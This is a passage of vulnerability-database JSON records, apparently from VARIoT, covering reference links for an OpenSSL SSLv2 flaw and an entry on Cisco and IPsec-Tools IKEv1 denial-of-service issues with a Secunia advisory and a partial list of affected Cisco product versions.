            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
          },
          {
            "trust": 0.2,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
          },
          {
            "trust": 0.2,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/9986131"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/vmtn/technology/security/security_response.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
            "url": "http://www.vmware.com/security"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3589"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4339"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4980"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/3069097"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayproductinfo.pl?productnumber=hpuxwssuite"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com/portal/swdepot/displayproductinfo.do?productnumber=b6834aa"
          },
          {
            "trust": 0.1,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.1,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2969"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "ident": null
          },
          {
            "db": "BID",
            "id": "20249",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "53566",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "53990",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964",
            "ident": null
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620",
            "ident": null
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300",
            "ident": null
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249",
            "ident": null
          },
          {
            "date": "2007-01-13T22:56:30",
            "db": "PACKETSTORM",
            "id": "53566",
            "ident": null
          },
          {
            "date": "2006-10-04T00:44:50",
            "db": "PACKETSTORM",
            "id": "50535",
            "ident": null
          },
          {
            "date": "2007-01-27T02:35:42",
            "db": "PACKETSTORM",
            "id": "53990",
            "ident": null
          },
          {
            "date": "2001-10-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200609-536",
            "ident": null
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964",
            "ident": null
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620",
            "ident": null
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300",
            "ident": null
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249",
            "ident": null
          },
          {
            "date": "2022-02-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200609-536",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200511-0015

    Vulnerability from variot - Updated: 2026-03-09 20:04

    Multiple unspecified vulnerabilities in the Internet Key Exchange version 1 (IKEv1) implementation in multiple Cisco products allow remote attackers to cause a denial of service (device reset) via certain malformed IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the Cisco advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ I SAKMP (Internet Security Association and Key Management Protocol) Authentication, key management, and SA (security association) of 3 A collective term for multiple protocols. ISAKMP Derived from IKE Is IPSec Key exchange protocol for encrypted communication. In many environments IKEv1 Is used. IKE Communication by phase 1 And phase 2 Divided into phases 1 Then establish a secure communication path, ISAKMP SA Called IKE Exchange own messages. In multiple products ISAKMP/IKE Implementation is illegal ISAKMP Phase 1 There is a problem that causes abnormal behavior when receiving this packet because there is a flaw in the processing of the packet. IKE When a deliberately created packet is sent by a remote attacker with specific information for communication by ISAKMP Services or devices that implement the may be in a service outage.Please refer to the “Overview” for the impact of this vulnerability. Various Cisco IOS, PIX Firewall, Firewall Services Module (FWSM), VPN 3000 Series Concentrator, and MDS Series SanOS releases are prone to denial of service attacks. These issues are due to security flaws in Cisco's IPSec implementation. The vulnerabilities may be triggered by malformed IKE traffic. Successful attacks will cause most affected devices to restart. For Cisco MDS Series devices, this is limited to causing the IKE process to restart. IP Security or IPSec (full name Internet Protocol Security) is a set of IP security protocols established by the IPSec group of the Internet Engineering Task Force (IETF). Access control, data source address verification, data integrity check and prevention of replay attacks. Vulnerabilities exist in the handling of IPSec IKE messages in several Cisco products. IPSec's PROTOS test suite can test the design limitations of IPSec implementations by sending malformed IKE messages to target devices.

    TITLE: IPsec-Tools ISAKMP IKE Message Processing Denial of Service

    SECUNIA ADVISORY ID: SA17668

    VERIFY ADVISORY: http://secunia.com/advisories/17668/

    CRITICAL: Moderately critical

    IMPACT: DoS

    WHERE:

    From remote

    SOFTWARE: IPsec-Tools 0.x http://secunia.com/product/3352/

    DESCRIPTION: A vulnerability has been reported in IPsec-Tools, which can be exploited by malicious people to cause a DoS (Denial of Service).

    The vulnerability is caused due to a NULL pointer dereferencing error when processing certain ISAKMP packets in aggressive mode.

    The vulnerability is related to: SA17553

    Successful exploitation requires a weak racoon configuration (e.g. no lifetime proposal or obey mode), and using 3DES/SHA1/DH2.

    SOLUTION: Update to version 0.6.3. http://sourceforge.net/project/showfiles.php?group_id=74601&package_id=74949&release_id=372605

    PROVIDED AND/OR DISCOVERED BY: The vendor credits Adrian Portelli.

    ORIGINAL ADVISORY: http://sourceforge.net/mailarchive/forum.php?thread_id=9017454&forum_id=32000 http://sourceforge.net/project/shownotes.php?release_id=372605&group_id=74601

    OTHER REFERENCES: SA17553: http://secunia.com/advisories/17553/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 2.7,
            "vendor": "cisco",
            "version": "12.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.3yw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.4xb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.4xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.3yt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.3yq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.3ym"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.3yx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.4t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "12.3yu"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "cisco",
            "version": "30002.5.2"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "cisco",
            "version": "12.3xx"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.5.2"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.5.2.d"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.7.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yk"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xd"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2\\(3.100\\)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2.3_\\(110\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1\\(6\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(3.210\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.6.7"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(9\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1\\(6b\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.3\\(3\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.5.2.c"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3\\(1\\)"
          },
          {
            "_id": null,
            "model": "mds 9000 san-os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3\\(3.33\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "mds 9000 san-os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.0\\(0.86\\)"
          },
          {
            "_id": null,
            "model": "mds 9000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "*"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.0.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xg"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(5\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(6\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.5.4"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(1\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.2\\(7\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.1\\(rel\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xq"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.5.2.a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ya"
          },
          {
            "_id": null,
            "model": "adaptive security appliance software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1\\(1\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.5.5"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2\\(1\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2\\(2\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.0\\(3\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.0.5.b"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "*"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xu"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.4\\(8\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.0.3.a"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xe"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xs"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.4\\(4\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1\\(4\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.6.7d"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "firewall services module",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.1_\\(3.005\\)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3.3_\\(133\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.3\\(1.200\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.4\\(7.202\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yh"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.5.1"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.0\\(1\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.1.2"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.0\\(4\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.0.3.b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yd"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1\\(2\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.1.5.b"
          },
          {
            "_id": null,
            "model": "mds 9000 san-os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3\\(4a\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.2\\(1\\)"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "3.5.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yf"
          },
          {
            "_id": null,
            "model": "vpn 3000 concentrator series software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3\\(3.109\\)"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yj"
          },
          {
            "_id": null,
            "model": "pix firewall software",
            "scope": "eq",
            "trust": 1.0,
